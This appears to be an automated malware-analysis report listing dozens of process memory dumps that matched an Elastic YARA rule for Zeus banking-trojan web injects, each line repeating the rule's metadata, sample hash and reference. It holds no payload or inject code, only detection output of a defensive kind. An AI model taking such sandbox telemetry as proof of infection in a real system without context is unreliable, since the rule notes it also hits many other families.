Source: 00000002.00000003.2754985393.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000018.00000002.2705436372.00000000024F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000015.00000002.2699555610.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.2605884801.00000000011E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2786368119.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001B.00000002.2725518370.0000000002E80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2776797358.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2763556222.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000009.00000002.2610626005.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2775373199.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2522335301.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.2611939403.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2519685174.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2763964877.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000007.00000002.2632861320.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000027.00000002.2871812715.0000000000CD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001E.00000002.2759598984.00000000025F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2808903395.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2761135252.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.2612614586.0000000002B80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2726433713.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2633125874.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2774233552.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2517359385.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001E.00000002.2785000519.00000000027A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2168260986.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2844886273.0000000001550000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3416553301.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2760597306.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2773682224.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2649332327.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.2639288300.00000000011D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000B.00000002.2649599507.0000000003270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2776308232.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000007.00000002.2635595118.0000000001040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2788341406.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2809880778.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2845868580.00000000015B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
